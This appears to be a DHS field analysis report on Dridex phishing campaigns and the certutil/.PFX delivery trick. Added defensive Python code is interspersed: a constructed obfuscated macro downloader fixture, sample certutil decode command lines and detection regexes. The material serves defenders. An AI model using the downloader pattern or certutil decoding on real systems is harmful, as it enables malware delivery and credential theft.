UNCLASSIFIED//FOR OFFICIAL USE ONLY

26 January 2017 (U//FOUO) Cyber Actors Alter Tactics, Techniques & Procedures Used in Persistent Malware Campaigns, Continue Affecting New England Critical Infrastructure

(U//FOUO) Prepared by the DHS Office of Intelligence and Analysis (I&A) in collaboration with the Connecticut Intelligence Center and Massachusetts Commonwealth Fusion Center.

(U//FOUO) Scope: This Field Analysis Report (FAR) is intended to provide an assessment of the evolution of tactics, techniques, and procedures (TTPs) used by cyber actors engaged in Dridex malware phishing campaigns impacting critical infrastructure in the New England region. This FAR provides insight into how Dridex indicators have recently evolved to help public and private sector computer network defenders strengthen their cybersecurity posture.

(U) Key Judgments

• (U//FOUO) Despite a significant disruption to a major malware distribution network in 2016, cyber actors continued to spread Dridex to New England critical infrastructure systems.

• (U//FOUO) Cyber actors continually alter Dridex malware code to evade detection by signature-based antivirus software.

• (U//FOUO) Cyber actors use the command-line program Certutil and Personal Information Exchange (.PFX) files to deliver Dridex malware, allowing it to pose as a legitimate security certificate.

(U//FOUO) Overview of Dridex Malware Activity in New England

(U//FOUO) Dridex is distributed via phishing e-mails targeting specific business departments, predominantly accounting, budget, and finance offices. Once Dridex is active on a compromised system, that system can be used to send spam e-mails, execute distributed denial-of-service (DDoS) attacks, or to harvest user credentials for many online services, including banking services.1 Between April 2015 and August 2016, DHS received numerous incident reports involving Dridex malware campaigns targeting critical infrastructure in Connecticut and Massachusetts.2–21 These campaigns targeted several critical infrastructure sectors in both states.22–28

(U//FOUO) The majority of the Dridex phishing e-mails during this period contained malicious Microsoft Word, Excel, or executable file attachments with embedded macros that were hidden through obfuscated Visual Basic script. The attachments were created on an operating system using Cyrillic characters. According to open source reporting, the files most commonly identified were “W97M/Downloader” and “W97M/Bartallex.”29 Command-and-control (C2) uniform resource locators (URLs), from which the Dridex payload was pulled, were written within the obfuscated Visual Basic script. The C2 URLs typically differed from one attachment to the next.30 The URLs were identified as recently compromised WordPress websites or other sites based in the United States or elsewhere. The obfuscated script also repeatedly referenced .txt files, using random alphanumeric naming conventions as well as text documents entitled “sasa.txt,” “lns.txt,” or “fafa.txt”.31,32 It is unknown what these text files contained.

IA-0073-17

(U) Warning: This document is UNCLASSIFIED//FOR OFFICIAL USE ONLY (U//FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.C. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public, the media, or other personnel who do not have a valid need to know without prior approval of an authorized DHS official. State and local homeland security officials may share this document with authorized critical infrastructure and key resource personnel and private sector security officials without further approval from DHS.

(U) This product contains US person information that has been deemed necessary for the intended recipient to understand, assess, or act on the information provided. It has been highlighted in this document with the label USPER and should be handled in accordance with the recipient's intelligence oversight and/or information handling procedures.

(U//FOUO) Dridex Malware

(U//FOUO) Dridex malware, previously known as Cridex or Bugat, is a credential-stealing malicious software that has targeted the financial sector since 2014. According to Dell Secureworks USPER, Dridex steals credentials, certificates, cookies, and other sensitive information from a compromised system, primarily to commit Automated Clearing House (ACH) and wire fraud. Dridex was created from the source code of the Bugat banking Trojan but is distinct from previous Bugat variants, particularly with respect to its modular architecture and its use of a hybrid peer-to-peer network to mask its backend infrastructure and complicate takedown attempts. The source code for Dridex, Cridex, and Bugat contains Cyrillic characters, which is consistent with the theory that the developers of Dridex were associated with an Eastern European gang called “The Business Club,” which developed the Gameover botnet.

(U) Once Dridex is installed and executed on an infected system, a cyber actor can upload or download files from a victim’s computer.33 In addition, cyber actors can execute files, monitor network traffic, and take browser screenshots.34 Cyber actors may also incorporate the infected system into a botnet for use in DDoS attacks or to further propagate Dridex malware.35 Once a system is infected, Dridex can communicate with other peer nodes through the peer-to-peer (P2P) protocol to retrieve configuration details, download and execute additional modules, download and execute additional files, and inject itself into browser processes for Internet Explorer, Chrome, and Firefox in order to monitor communications and steal information.36

(U) Dridex primarily impacts users by stealing their personal information, such as online banking account credentials, through its many personal information theft and browser monitoring routines.37 Stolen login credentials may lead to a victim’s other online accounts, such as social media, being broken into and/or hijacked.38 The screenshots taken may also inadvertently expose more personal information.39 In addition, a system infected with Dridex may be employed to send spam e-mails or execute DDoS attacks.40
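(U) The obfuscated-macro delivery described in the overview above hides the C2 URLs and the .txt file names inside Visual Basic string-building code, and a defender usually wants to pull those indicators out without opening the document on a live host. The following is an added example, not code from this report or from any vendor it cites: a small Python deobfuscator that resolves VBA string assignments built from literals, Chr()/ChrW(), StrReverse() and "&" concatenation, then searches the resolved strings for URLs and .txt names. The macro text is constructed for the example, and the particular obfuscation idioms it understands are an assumption about common VBA downloader style, not details taken from the report.

```python
"""Resolve Chr()/concatenation-obfuscated VBA strings and extract URL and .txt indicators.

Added example, not from the report. SAMPLE_VBA is constructed; the idioms handled
(literals, Chr/ChrW/Chr$, StrReverse, '&' concatenation, earlier variables) are an
assumption about typical macro downloaders, not a description of a specific sample.
"""
import re

# Constructed macro text for the example; not a sample from the report.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim a As String, b As String, c As String
    a = Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & "//" & StrReverse("moc.elpmaxe") & "/wp-content/"
    b = a & "sasa" & Chr(46) & "txt"
    c = ChrW(104) & "ttp://" & "example" & Chr(46) & "net/" & StrReverse("txt.afaf")
    Call Download(b, c)
End Sub
'''

# `name = expr` lines only; `If x = 1` style comparisons would also match, which is
# acceptable for a heuristic that only looks at the strings it can resolve.
ASSIGN = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'                        # 1: string literal ("" escapes a quote)
    r'|Chr[W$]?\(\s*(\d+)\s*\)'                 # 2: Chr(n) / ChrW(n) / Chr$(n)
    r'|StrReverse\(\s*"((?:[^"]|"")*)"\s*\)'    # 3: StrReverse("literal")
    r'|([A-Za-z_]\w*)',                         # 4: identifier (an earlier variable)
    re.IGNORECASE,
)
URL = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
TXT = re.compile(r'\b[\w-]+\.txt\b', re.IGNORECASE)


def deobfuscate(vba: str) -> dict:
    """Map each assigned variable to the string its expression builds.

    Tokens other than the four understood kinds (function calls, arithmetic,
    unknown names) contribute the empty string, so partial results still surface."""
    env = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.group(1), m.group(2)
        parts = []
        for tok in TOKEN.finditer(expr):
            lit, code, rev, ident = tok.groups()
            if lit is not None:
                parts.append(lit.replace('""', '"'))
            elif code is not None:
                parts.append(chr(int(code)))
            elif rev is not None:
                parts.append(rev.replace('""', '"')[::-1])
            else:
                parts.append(env.get(ident, ''))
        env[name] = ''.join(parts)
    return env


def extract_iocs(vba: str) -> dict:
    """Return sorted URLs and .txt file names found in any resolved string."""
    urls, txts = set(), set()
    for value in deobfuscate(vba).values():
        urls.update(URL.findall(value))
        txts.update(t.lower() for t in TXT.findall(value))
    return {'urls': sorted(urls), 'txt_files': sorted(txts)}


if __name__ == '__main__':
    for key, items in extract_iocs(SAMPLE_VBA).items():
        print(key, items)
```

Run against a macro dumped with a tool such as olevba, the output gives the URL and file-name indicators to block or hunt for; anything the resolver could not evaluate is simply missing, so an empty result is a prompt to look at the macro by hand rather than proof that it is clean.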

(U//FOUO) Dridex Malware Campaigns Continue to Target New England Despite Temporary Disruption of Botnet Primarily used for Distribution

(U//FOUO) Despite a temporary disruption of the Necurs botnet, a major distribution network for Dridex, between May and June 2016, cyber actors continued to distribute the malware to New England critical infrastructure, though at a reduced rate. According to open source reporting, the Necurs botnet played a critical role in supporting the delivery of malicious e-mails while obfuscating the identifiable details of the cyber actors behind the campaigns.41 In May 2016, the Necurs botnet experienced an outage that resulted in a sudden drop in Dridex and Locky ransomware infections.42,43 The botnet outage revealed that the network command-and-control center was actually controlling around 1.1 million hosts, contradicting previous host estimates in the tens of thousands.44,45

(U//FOUO) Necurs Botnet

(U//FOUO) According to Threatpost and Proofpoint, Necurs is one of the world’s largest botnets. Necurs is a malware family known for its rootkit capabilities, which include both a user-mode and a kernel-mode component, making it a very capable piece of malware that is able to tamper with the system at the lowest level. Necurs is commonly installed by other families of malware (e.g., Zeus, Dorkbot), but reports show that it can also be distributed on its own using exploit kits. Once Necurs gains access to a system, it is able to steal user information, install additional malware, or send spam e-mails.

(U//FOUO) Dridex malware continued to affect critical infrastructure in New England by harvesting user credentials for online services, including banking services, or leveraging infected systems to engage in DDoS attacks. However, cyber actors are forgoing the use of Dridex malware for more profitable ransomware campaigns using many of the same distribution networks previously used for Dridex.46 The profitability of ransomware may account for the drop in Dridex campaigns more so than disruptions in botnets used for malware distribution.47


(U//FOUO) Cyber Actors May Implement New TTPs to Bypass Signature-based Antivirus Software

(U//FOUO) According to information from a credible cybersecurity firm, cyber actors engaged in Dridex malware campaigns have adopted new TTPs in an effort to evade signature-based antivirus software.48

(U//FOUO) Customized or regionalized malware is the most difficult form of malware to detect, since its signature changes constantly as the malware is re-tailored to specific regions, industries, or businesses.49 Minor modifications to the malware, such as altering a single character of the file, produce a different file hash and therefore a different signature, which allows the file to circumvent signature-based antivirus software until the new signature has been incorporated into the antivirus software’s list of malicious signatures.50 Free online tools such as VirusTotal, which analyzes files and URLs to identify viruses, worms, Trojans, and other kinds of malicious content, give cyber actors the ability to check whether the hash value of their malware is already known without actually submitting the malware file for analysis. This spares the cyber actor from having to sacrifice the malware just to check whether other antivirus solutions would catch it.

(U//FOUO) Signature-Based Malware Detection

(U//FOUO) When a malware sample arrives in the hands of an antivirus software firm, it is analyzed by malware researchers or by dynamic analysis systems. Then, once it is determined to be malicious, a proper signature of the file is extracted and added to the signature database of the antivirus software. Although the signature-based approach can effectively contain malware outbreaks, malware authors have tried to stay a step ahead of such software by writing "oligomorphic", "polymorphic", and, more recently, "metamorphic" viruses, which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as not to match the virus signatures in the dictionary.

(U) Hash Value

(U) A hash value is a numeric value of a fixed length that uniquely identifies data. Hash values represent large amounts of data as much smaller numeric values, which is why they are used with digital signatures.
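(U) To make the point about signature brittleness concrete, here is an added example in Python that is not part of the report: a one-byte change to a file gives it a new SHA-256, so a hash-based signature, or a VirusTotal hash lookup, no longer matches it, while a YARA-style byte pattern that wildcards the operands of the invariant code still does, until the attacker changes an opcode the pattern depends on. The bytes and the pattern are constructed stand-ins for a code fragment, not taken from a real Dridex sample.

```python
"""Why a one-byte change defeats a hash signature but not a wildcard byte pattern.

Added example, not from the report. ORIGINAL is a constructed stand-in for part of
an executable (not a real sample) and CODE_PATTERN is likewise invented.
"""
import hashlib
import re

# Constructed bytes: the start of a DOS 'MZ' header followed by a small x86 function.
ORIGINAL = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'   # MZ header start (fixed across builds)
    '558bec83ec10'                        # push ebp; mov ebp,esp; sub esp,0x10
    'c745fc00000000'                      # mov dword [ebp-4], 0
    '6848656c6c'                          # push 0x6c6c6548   <- constant an author retunes per build
    'e8deadbeef'                          # call rel32        <- varies with layout
    '8be55dc3'                            # mov esp,ebp; pop ebp; ret
)

# YARA-style hex pattern over the invariant opcodes; '??' wildcards the operand bytes.
CODE_PATTERN = '55 8B EC 83 EC ?? C7 45 FC ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C3'


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def hash_signature_matches(data: bytes, known_hashes: set) -> bool:
    """The check a hash-only blocklist or a hash-lookup service performs."""
    return sha256_hex(data) in known_hashes


def compile_hex_pattern(pattern: str) -> re.Pattern:
    """Turn 'AA ?? BB' into a bytes regex in which '??' matches any single byte."""
    parts = []
    for tok in pattern.split():
        parts.append(b'.' if tok == '??' else re.escape(bytes([int(tok, 16)])))
    return re.compile(b''.join(parts), re.DOTALL)


def pattern_matches(data: bytes, compiled: re.Pattern) -> bool:
    return compiled.search(data) is not None


def mutate_byte(data: bytes, offset: int, mask: int = 0x01) -> bytes:
    """Flip bits in one byte: the 'single character' change the report describes."""
    return data[:offset] + bytes([data[offset] ^ mask]) + data[offset + 1:]


if __name__ == '__main__':
    variant = mutate_byte(ORIGINAL, 30)          # offset 30 lies inside the push immediate
    known = {sha256_hex(ORIGINAL)}
    pat = compile_hex_pattern(CODE_PATTERN)
    print('hash signature  original/variant:',
          hash_signature_matches(ORIGINAL, known), hash_signature_matches(variant, known))
    print('byte pattern    original/variant:',
          pattern_matches(ORIGINAL, pat), pattern_matches(variant, pat))
```

The pattern survives operand edits because it only pins the opcodes; it is still a signature, and changing one of the pinned opcode bytes defeats it too, which is why patterns are written over code the author has no reason to touch and are paired with behavioral detection rather than relied on alone.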

(U//FOUO) Dridex Poses as Fake Certificate to Exploit Vulnerabilities in Security Solutions

(U) Prior to the Necurs outage, Dridex campaigns relied on malicious Microsoft Word and Excel documents and executable files, with the documents prompting recipients to enable macros. Once macros were enabled, the malicious document retrieved an embedded URL and downloaded the Dridex Trojan to the computer.51

(U) Changes in the Dridex campaign modus operandi have made Dridex harder for antivirus software to detect. Since June 2016, an increasing number of Dridex campaigns have used phishing e-mails with .ZIP file attachments.52 When the .ZIP attachment is opened, a .PFX file is dropped. The .PFX file is not a real certificate but a base64-encoded text file; the built-in Windows command-line tool certutil is then used (certutil -decode) to decode it into a .EXE file, and that .EXE file infects the system or network with Dridex.53

(U) Because the dropped file arrives as base64 text with a .PFX extension rather than as an executable, it does not match the file-type and signature checks that security solutions apply to .EXE attachments.54 The .PFX extension and the use of certutil, a legitimate, Microsoft-signed Windows utility, together pass the malicious payload off as a routine certificate operation.55 A security solution that accepts the file as a legitimate certificate, or that trusts activity performed by certutil, will not block or flag it, and further files delivered with the same technique will pass in the same way.56
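(U) Two checks a defender can script for the chain described above, as an added example in Python that is not code from this report or from Trend Micro: flagging process-creation events in which certutil is invoked with a decode verb, and telling a genuine PKCS#12 file from a base64 text blob that decodes to a PE. The command lines and the "executable" are constructed for the example. Sysmon Event ID 1 and Windows Security event 4688 are the usual sources for such command lines, and certutil's -decodehex verb is included as a closely related variant the report itself does not mention.

```python
"""Two scriptable checks for the certutil/.PFX delivery chain.

Added example, not code from the report or from Trend Micro. The process command
lines and the 'executable' below are constructed for the example.
"""
import base64
import re
import struct

# certutil run with a decode verb; -decodehex is a related certutil verb the report
# does not describe but which serves the same purpose.
CERTUTIL_DECODE = re.compile(
    r'\bcertutil(?:\.exe)?\b.*?\s[-/](?:decode|decodehex)\b', re.IGNORECASE)
PEM_LINE = re.compile(rb'-----(?:BEGIN|END)[^-]*-----')

# Constructed process-creation command lines (what Sysmon Event ID 1 or Security
# event 4688 would record); not real telemetry.
SAMPLE_PROCESS_EVENTS = [
    r'C:\Windows\System32\certutil.exe -decode C:\Users\jdoe\AppData\Local\Temp\cert.pfx C:\Users\jdoe\AppData\Local\Temp\svc.exe',
    r'C:\Windows\System32\certutil.exe -verify -urlfetch C:\certs\server.cer',
    r'"C:\Program Files\Git\bin\git.exe" fetch origin',
    r'certutil -decodehex C:\Users\jdoe\Downloads\payload.txt C:\Users\jdoe\Downloads\payload.exe',
]


def flag_certutil_decode(cmdlines):
    """Return the command lines in which certutil decodes a file to disk."""
    return [c for c in cmdlines if CERTUTIL_DECODE.search(c)]


def looks_like_pe(data: bytes) -> bool:
    """MZ header whose e_lfanew (offset 0x3C) points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b'PE\0\0'


def classify_pfx(data: bytes) -> str:
    """Classify a file that arrives with a .pfx extension.

    A genuine PKCS#12 file is DER: a SEQUENCE tag (0x30) followed by a long-form
    length byte (0x81..0x84, high bit set). Base64 text never has the high bit set,
    so a blob that happens to start with ASCII '0' (also 0x30) is not taken for DER."""
    if len(data) >= 2 and data[0] == 0x30 and 0x81 <= data[1] <= 0x84:
        return 'der-pkcs12'
    body = re.sub(rb'\s+', b'', PEM_LINE.sub(b'', data))
    try:
        decoded = base64.b64decode(body, validate=True)
    except ValueError:                      # binascii.Error is a ValueError subclass
        return 'unknown'
    return 'base64-pe' if looks_like_pe(decoded) else 'base64-other'


def build_fake_pe() -> bytes:
    """A minimal, non-runnable MZ/PE header standing in for a dropped executable."""
    dos = bytearray(0x40)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 0x40)     # e_lfanew: PE header right after the DOS header
    return bytes(dos) + b'PE\0\0' + b'\x4c\x01' + bytes(120)   # Machine = i386, then padding


def certutil_style_encode(data: bytes) -> bytes:
    """Base64 in the layout certutil -encode writes: PEM-style header/footer, 64-column lines."""
    b64 = base64.b64encode(data)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b'-----BEGIN CERTIFICATE-----\r\n' + b'\r\n'.join(lines)
            + b'\r\n-----END CERTIFICATE-----\r\n')


if __name__ == '__main__':
    for c in flag_certutil_decode(SAMPLE_PROCESS_EVENTS):
        print('certutil decode:', c)
    blob = certutil_style_encode(build_fake_pe())
    print('dropped .pfx classified as:', classify_pfx(blob))
```

The process check is the higher-value one: certutil decoding anything outside a certificate-management context is rare on user workstations, so the event can be alerted on directly, and the output path named in the command line is the file to collect. The content check is for mail gateways and sandboxes, where a ".pfx" that is really base64 text decoding to an MZ/PE image should be treated as an executable attachment regardless of its extension.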

(U) Recommendations

• (U) E-mail from unknown senders should be treated with caution. If an e-mail looks strange, do the following: ignore it, delete it, and never open attachments or click on URLs.

• (U) Opening file attachments, especially from unknown senders, carries risk. Attachments should first be scanned with an antivirus program and, if necessary, deleted without being opened.

• (U) Never click links in e-mails without checking the URL. Many e-mail programs permit the actual target of the link to be seen using the mouse-over function, specifically by hovering the mouse over the visible link without actually clicking on it.


(U) DHS I&A Perspective

(U//FOUO) I&A assesses cyber actors’ use of Dridex poses a moderate and increasing threat to state and local networks because this type of malware is evolving and is used widely. Cyber actors can use Dridex to steal credentials and access sensitive systems, such as PII databases or industrial control systems, to commit financial theft against public entities with limited budgets, or to enable more disruptive malicious software like ransomware.

(U//FOUO) Comments, requests, or shareable intelligence may be directed to the Commonwealth Fusion Center at [email protected].

(U) Source Summary Statement

(U//FOUO) This FAR is based on cybersecurity incident reports and open sources. We have high confidence in the accuracy and reliability of cybersecurity incident findings. We have medium confidence in the information obtained from open sources, which include media reports and websites where information is credibly sourced and plausible but may contain biases or unintentional inaccuracies.

(U) Report Suspicious Activity

(U) To report suspicious activity, law enforcement, Fire-EMS, private security personnel, and emergency managers should follow established protocols; all other personnel should call 911 or contact local law enforcement. Suspicious activity reports (SARs) will be forwarded to the appropriate fusion center and FBI Joint Terrorism Task Force for further action. For more information on the Nationwide SAR Initiative, visit http://nsi.ncirc.gov/resources.aspx.

(U) Reporting Computer Security Incidents

(U) To report a computer security incident, either contact US-CERT at 888-282-0870, or go to https://forms.us-cert.gov/report/ and complete the US-CERT Incident Reporting System form. The US-CERT Incident Reporting System provides a secure, web-enabled means of reporting computer security incidents to US-CERT. An incident is defined as a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard computer security practices. In general, types of activity commonly recognized as violating typical security policies include attempts (either failed or successful) to gain unauthorized access to a system or its data, including personally identifiable information; unwanted disruption or denial of service; the unauthorized use of a system for processing or storing data; and changes to system hardware, firmware, or software without the owner’s knowledge, instruction, or consent.

(U) Tracked by: TIO2015A1.1.1.2; TIO2015A.1.1.2.2.; TIO2015A.1.1.2.4; TIO2015A.1.1.2.17; USTA2750001614; ODHS2750000416; DIAC2700517415; DIAC1524507015; HSEC-1.7; HSEC-1.5; DHS-IA-CYB.3.1; JTF-E-PIR-4.3; HSEC- 1.10; HSEC-1.1; HSEC-1.2; JTF-E-PIR-4.6; DHS-IA-CYB.2.2; HSEC-1.8; HSEC-1.3; ACC-4.1.


1 (U); US-CERT; Alert (TA15-286A); “Dridex P2P Malware”; 29 SEP 2016; https://www.us-cert.gov/ncas/alerts/TA15-286A; accessed on 19 JAN 2017.
2 (U//FOUO); DHS; IIR 4 014 0078 16; 281900Z JUL 16; DOI 03 JUN 2016 – 30 JUN 2016; (U//FOUO); Foreign-Based Internet Protocol Addresses Hosting Malware Identified from Cyber-Activity Originating on U.S. State and Local Government Systems Between 3 and 30 June 2016; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state government cybersecurity official with direct access during the course of official duties.
3 (U//FOUO); DHS; IIR 4 045 0089 16; 301348Z DEC 15; DOI 17 JUN 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.
4 (U//FOUO); DHS; IIR 4 045 0144 16; 040112Z MAR 16; DOI 08 FEB 2016; (U//FOUO); MA-Technical Details of Dridex Associated Emails Received by Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with first and secondhand access to the information through official duties.
5 (U//FOUO); DHS; IIR 4 045 0145 16; 040127Z MAR 16; DOI 02 APR 2015; (U//FOUO); MA-Technical Details of Dridex Associated Attachment Received by a Massachusetts-Based Information Technology Security Company; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
6 (U//FOUO); DHS; IIR 4 045 0146 16; 040135Z MAR 16; DOI 08 OCT 2015 – 23 NOV 2015; (U//FOUO); MA-Technical Details of 11 Dridex Associated Attachments Received by a Massachusetts-Based Cleared Defense Contractor; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
7 (U//FOUO); DHS; IIR 4 045 0147 16; 040141Z MAR 16; DOI 10 JUN 2015; (U//FOUO); CT - Technical Details of Dridex Associated Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.
8 (U//FOUO); DHS; IIR 4 045 0148 16; 040210Z MAR 16; DOI 22 JUL 2015; (U//FOUO); CT - Technical Details of Dridex Associated Email and Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.
9 (U//FOUO); DHS; IIR 4 045 0149 16; 072317Z MAR 16; DOI 05 AUG 2015 – 07 OCT 2015; (U//FOUO); MA-Technical Details of 12 Dridex Malware Associated E-Mail Attachments Received by a Massachusetts-Based Cleared Defense Contractor; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
10 (U//FOUO); DHS; IIR 4 045 0153 16; 151841Z MAR 16; DOI 03 DEC 2015; (U//FOUO); MA-Technical Details of Dridex Associated Spearphishing Email Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
11 (U//FOUO); DHS; IIR 4 045 0154 16; 151847Z MAR 16; DOI 15 JAN 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
12 (U//FOUO); DHS; IIR 4 045 0156 16; 162044Z MAR 16; DOI 27 JAN 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
13 (U//FOUO); DHS; IIR 4 045 0157 16; 171509Z MAR 16; DOI 27 NOV 2015; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
14 (U//FOUO); DHS; IIR 4 045 0160 16; 172144Z MAR 16; DOI 08 APR 2015; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based Information Technology Security Company; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
15 (U//FOUO); DHS; IIR 4 045 0161 16; 181817Z MAR 16; DOI 03 SEP 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.
16 (U//FOUO); DHS; IIR 4 045 0162 16; 181823Z MAR 16; DOI 01 SEP 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.


17 (U//FOUO); DHS; IIR 4 045 0170 16; 081801Z APR 16; DOI 28 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email and Attachment Received by Commonwealth of Massachusetts Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties.
18 (U//FOUO); DHS; IIR 4 045 0180 16; 062309Z MAY 16; DOI 23 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email Attachment Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
19 (U//FOUO); DHS; IIR 4 045 0186 16; 13211Z MAY 16; DOI 22 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email and Attachment Received by Commonwealth of Massachusetts Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties.
20 (U//FOUO); DHS; IIR 4 045 0192 16; 250238Z MAY 16; DOI 13 APR 2016; (U//FOUO); MA-Technical Details of Successful Dridex Infection on Commonwealth of Massachusetts Government Computer; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties.
21 (U//FOUO); DHS; IIR 4 045 0212 16; 221929Z JUL 16; DOI 07 JUL 2016; (U//FOUO); MA-Technical Details of Dridex Infection on Commonwealth of Massachusetts Government Computer; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties.
22 (U//FOUO); DHS; IIR 4 045 0089 16; 301348Z DEC 15; DOI 17 JUN 2015; (U//FOUO); CT - Technical Details of Malicious Spear Phishing Email Intending to Deliver Dridex Malware Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state/local official with direct access to the information.
23 (U//FOUO); DHS; IIR 4 045 0170 16; 081801Z APR 16; DOI 28 MAR 2016; (U//FOUO); MA-Technical Details of Dridex Associated Email and Attachment Received by Commonwealth of Massachusetts Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A public sector cybersecurity official with direct and indirect access to information through official duties.
24 (U//FOUO); DHS; IIR 4 045 0145 16; 040127Z MAR 16; DOI 02 APR 2015; (U//FOUO); MA-Technical Details of Dridex Associated Attachment Received by a Massachusetts-Based Information Technology Security Company; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
25 (U//FOUO); DHS; IIR 4 045 0146 16; 040135Z MAR 16; DOI 08 OCT 2015 – 23 NOV 2015; (U//FOUO); MA-Technical Details of 11 Dridex Associated Attachments Received by a Massachusetts-Based Cleared Defense Contractor; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
26 (U//FOUO); DHS; IIR 4 045 0153 16; 151841Z MAR 16; DOI 03 DEC 2015; (U//FOUO); MA-Technical Details of Dridex Associated Spear-phishing Email Received by a Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with secondhand access to the information through official duties.
27 (U//FOUO); DHS; IIR 4 045 0144 16; 040112Z MAR 16; DOI 08 FEB 2016; (U//FOUO); MA-Technical Details of Dridex Associated Emails Received by Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with first and secondhand access to the information through official duties.
28 (U//FOUO); DHS; IIR 4 045 0144 16; 040112Z MAR 16; DOI 08 FEB 2016; (U//FOUO); MA-Technical Details of Dridex Associated Emails Received by Massachusetts-Based University; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A US Government official with first and secondhand access to the information through official duties.
29 (U); Jorge Arias and Yerko Grbic; McAfee Blog Central; “‘Banking’ Malware Dridex Arrives via Phishing Email”; 26 MAR 2015; https://blogs.mcafee.com/mcafee-labs/banking-malware-dridex-arrives-via-phishing-email/; accessed on 02 JUN 2016.
30 (U); Sudeep Singh, Geok Meng Ong, Joonho Sa, Ronghwa Chong, Shinsuke Honjo; FireEye Threat Research Blog; “Evolution of Dridex”; 18 JUN 2015; https://www.fireeye.com/blog/threat-research/2015/06/evolution_of_dridex.html; accessed on 02 JUN 2016.
31 (U//FOUO); DHS; IIR 4 045 0162 16; 181823Z MAR 16; DOI 01 SEP 2015; (U//FOUO); CT - Technical Details of Dridex Associated Email and Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state cyber intelligence analyst with first and secondhand access to information through official duties.
32 (U//FOUO); DHS; IIR 4 045 0148 16; 040210Z MAR 16; DOI 22 JUL 2015; (U//FOUO); CT - Technical Details of Dridex Associated Email and Attachment Received by State of Connecticut Government; Extracted information is U//FOUO; Overall document classification is U//FOUO; (U//FOUO); A state cyber intelligence analyst with first and secondhand access to information through official duties.


